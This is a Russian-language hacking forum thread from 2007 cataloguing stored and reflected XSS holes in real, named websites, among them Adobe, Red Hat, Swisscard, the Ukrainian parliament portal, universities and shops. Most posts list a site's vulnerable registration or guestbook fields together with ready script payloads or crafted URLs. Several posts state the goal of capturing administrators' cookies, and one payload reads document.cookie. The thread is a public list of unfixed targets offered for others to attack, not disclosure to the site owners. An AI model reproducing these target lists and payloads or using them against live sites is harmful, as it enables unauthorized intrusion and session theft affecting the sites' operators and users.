Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    xss

    netprint.ru

    Регистрируемся, создаем альбом с любым именем и грузим фотографию, которую переименовываем в <script>alert()</script>

    Укладываемся в 40 символов.
     
    2 people like this.
  2. phol1eadeux

    phol1eadeux Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -1
    ЛЕНТА - сеть гипермаркетов
    Code:
    http://www.lenta.com/index.php?path=node/191&searchword="><script>alert('XSS')</script>
     
  3. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Ошибся разделом, это пассивная
     
    1 person likes this.
  4. phol1eadeux

    phol1eadeux Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -1
    Разобрался
     
    #104 phol1eadeux, 3 Nov 2007
    Last edited: 3 Nov 2007
    1 person likes this.
  5. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    http://nsti.ru/guest/

    Гостевая книга

    Добавляем во все формы: "onmouseover="alert('xss')"
     
  6. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Code:
    www.miem.edu.ru
    Заходим в раздел выпускники и регистрируем себя. Уязвимые поля: город, адрес, icq, web.
    Code:
    http://www.econ.msu.ru/
    Регистрируемся, уязвимые поля в регистрации: Фамилия, Имя
    Code:
    http://www.rapway.com.ru/
    Гостевая книга. Уязвимые поля: Имя, E-mail, ICQ, Сайт
    Code:
    www.saletime.biz
    Гостевая книга. Уязвимо поле: Имя
    Code:
    http://livemy.info
    Регистрируемся, идем в раздел "События", уязвимое поле - описание события.
    Code:
    http://blog.inf.by
    Регистрируемся, уязвимое поле: Название блога

    Че-то пост разросся =)
     
    #106 Roba, 4 Nov 2007
    Last edited: 7 Nov 2007
    2 people like this.
  7. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    Верховная Рада Украины =)
    Code:
    http://portal.rada.gov.ua 
    Регистрируемся, уязвимые поля: Имя, Ответ на секретный вопрос, Прозвiще вроде =)
     
    1 person likes this.
  8. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Adobe.com

    регимся здесь

    Code:
    https://www.adobe.com/cfusion/membership/index.cfm?nf=1&loc=en%5Fus
    при регистрации вставляем в любое поле
    <script>alert(12121)</script>

    кроме e-mail, password, zip-code...

    заходим в свой аккаунт и видим активную XSS...
    Можно предположить, что админ сможет просмотреть аккаунт пользователя, а заодно и отправить куки на снифф :)
     
    4 people like this.
  9. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    http://www.pcgames.lt
    Уязвимые поля при регистрации:Nick,Vardas,Pavardė
     
  10. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    www.omen.ru
    Уязвимые поля при регистрации:Имя,О себе кратко, О себе подробно, возможно еще множество полей, дальше проверять не стал, ибо смысла не вижу =)
    P.S. Сорри за 2ой пост =)
     
    1 person likes this.
  11. phol1eadeux

    phol1eadeux Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -1
    это в пассивные xss
     
  12. it's my

    it's my Banned

    Joined:
    29 Sep 2007
    Messages:
    335
    Likes Received:
    347
    Reputations:
    36
    www.fanat.com.ua
    Украинские фанаты футбола

    Code:
    http://www.fanat.com.ua/cgi-bin/search.cgi?q=%22%3E%3Cscript%3Ealert(achat)%3C/script%3E%3C%22
     
  13. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    1. Это пассивная.
    2. Сообщение в алерте нуждается в одинарных кавычках.
     
    #113 Roba, 27 Nov 2007
    Last edited: 27 Nov 2007
  14. inlanger

    inlanger Elder - Старейшина

    Joined:
    7 Jan 2007
    Messages:
    985
    Likes Received:
    283
    Reputations:
    27
    это тоже пассивная. люди, читайте статьи и разбирайтесь что в какую тему писать
     
    1 person likes this.
  15. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://www.rabotnitsa.ru/guestbook.php
    сайт журнала работница уязвимые поля емейл, автор
     
    2 people like this.
  16. otmorozok428

    otmorozok428 Banned

    Joined:
    19 Oct 2007
    Messages:
    127
    Likes Received:
    88
    Reputations:
    17
    Форум сертифицированных специалистов :)

    http://www.certification.ru

    В добавляемое сообщение вставляем:

    И ждём, когда к нам в гости прилетят админские кукизы.
     
    1 person likes this.
  17. Fugitif

    Fugitif Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    407
    Likes Received:
    227
    Reputations:
    42
    REDHAT

    Code:
    https://www.redhat.com/wapps/sso/rhn/login.html?redirect=%22%3E%3Cscript%3Ealert(%22XSS%20by%20Fugitif%22)%3C/script%3E

    SWISS CARD

    Code:
    http://www.swisscard.ch/d/stellen/stellen_detail.php?oid=%22%3E%3Cscript%3Ealert(%22XSS%20by%20Fugitif%22)%3C/script%3E

    AND

    PAYPAL SUCKS

    Code:
    http://www.paypalsucks.com/forums/showthread.php?fid=17&tid=6209&old_block=0&block=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

    :p



    EDIT:


    here is wrong place...sorry ppl
     
    1 person likes this.
  18. NilsonUA

    NilsonUA Elder - Старейшина

    Joined:
    25 Nov 2007
    Messages:
    18
    Likes Received:
    8
    Reputations:
    2
    libra.kiev.ua/list_lyr.php?show_id=6578&page=1


    в поле эмайл вводим '"><script>alert('Хss')</script>
     
  19. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    http://playboy.com.ru/stat/se.php
    активная ксс на официальном российском сайте суперпопулярного плейбоя
    описание тут:
    https://forum.antichat.ru/thread55136.html
     
    1 person likes this.
  20. Mike 007

    Mike 007 Elder - Старейшина

    Joined:
    4 Apr 2007
    Messages:
    58
    Likes Received:
    47
    Reputations:
    -4
    http://www.babki.net/search.php
    в поисковике товаров введите <script>alert('Mike 007 rulezz :D')</script>